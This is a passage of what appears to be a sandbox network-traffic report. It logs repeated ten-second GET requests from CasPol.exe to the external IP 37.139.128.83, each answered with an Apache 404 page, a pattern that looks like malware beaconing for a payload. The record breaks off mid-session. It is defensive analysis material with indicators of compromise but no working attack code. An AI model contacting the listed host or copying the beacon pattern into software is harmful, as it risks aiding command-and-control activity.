                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:38.178886890 CET | 244 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:38.178935051 CET | 244 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:38.178988934 CET | 244 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    12 | 192.168.11.20 | 49816 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:48.207734108 CET | 252 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:48.283617020 CET | 253 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:48 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:48.283715010 CET | 253 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:48.283776999 CET | 253 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:48.283837080 CET | 254 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:48.283891916 CET | 254 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    13 | 192.168.11.20 | 49817 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:58.314579010 CET | 254 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:58.372782946 CET | 255 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:58 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:58.372881889 CET | 256 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:58.372941971 CET | 256 | IN |
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:58.372997999 CET | 256 | IN |
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:58.373060942 CET | 256 | IN |
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    14 | 192.168.11.20 | 49819 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:08.405410051 CET | 264 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:08.439033985 CET | 264 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:08 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:19:08.439058065 CET | 265 | IN |
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:19:08.439074993 CET265INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:19:08.439090967 CET265INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:19:08.439105988 CET265INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    15 | 192.168.11.20 | 49820 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:18.465970039 CET | 266 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:18.525351048 CET | 267 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:18 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    16 | 192.168.11.20 | 49821 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:28.558624983 CET | 268 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:28.602679014 CET | 269 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:28 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    17 | 192.168.11.20 | 49823 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:38.633337021 CET | 278 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:38.664674044 CET | 278 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:38 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    18 | 192.168.11.20 | 49824 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:48.697762966 CET | 280 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:48.783301115 CET | 281 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:48 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    19 | 192.168.11.20 | 49825 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:19:58.816569090 CET | 283 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:19:58.909148932 CET | 283 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:19:58 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.11.20 | 49798 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:17:07.058161974 CET | 179 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:07.129527092 CET | 179 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:07 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    20 | 192.168.11.20 | 49827 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:08.938875914 CET | 292 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:08.962862968 CET | 292 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:08 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:08.962925911 CET293INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:08.962971926 CET | 293 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:08.963013887 CET | 294 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:08.963059902 CET | 294 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    21 | 192.168.11.20 | 49829 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:19.000097990 CET | 301 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:19.051856041 CET | 301 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:18 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:19.051923037 CET | 302 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:19.051974058 CET | 302 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:19.052016973 CET | 303 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:19.052059889 CET | 303 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    22 | 192.168.11.20 | 49830 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:29.075845957 CET | 303 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:29.104176044 CET | 304 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:29 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:29.104244947 CET | 304 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:29.104290962 CET | 305 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:29.104368925 CET | 305 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:29.104415894 CET | 305 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    23 | 192.168.11.20 | 49832 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:39.138921976 CET | 313 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:39.227524042 CET | 313 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:39 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:39.227592945 CET | 314 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:39.227638960 CET | 314 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:39.227682114 CET | 314 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:39.227729082 CET | 314 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    24 | 192.168.11.20 | 49833 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:49.257998943 CET | 315 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:49.293009043 CET | 316 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:49 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:49.293040991 CET | 316 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:49.293061972 CET | 317 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:49.293082952 CET | 317 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:49.293103933 CET | 317 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    25 | 192.168.11.20 | 49834 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:20:59.318969011 CET | 317 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:20:59.346731901 CET | 318 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:20:59 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:20:59.346787930 CET | 319 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:20:59.346818924 CET | 319 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:20:59.346847057 CET | 319 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:20:59.346941948 CET | 319 | IN
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    26 | 192.168.11.20 | 49836 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:21:09.379271984 CET | 327 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:21:09.426351070 CET | 327 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:21:09 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:21:09.426366091 CET | 328 | IN
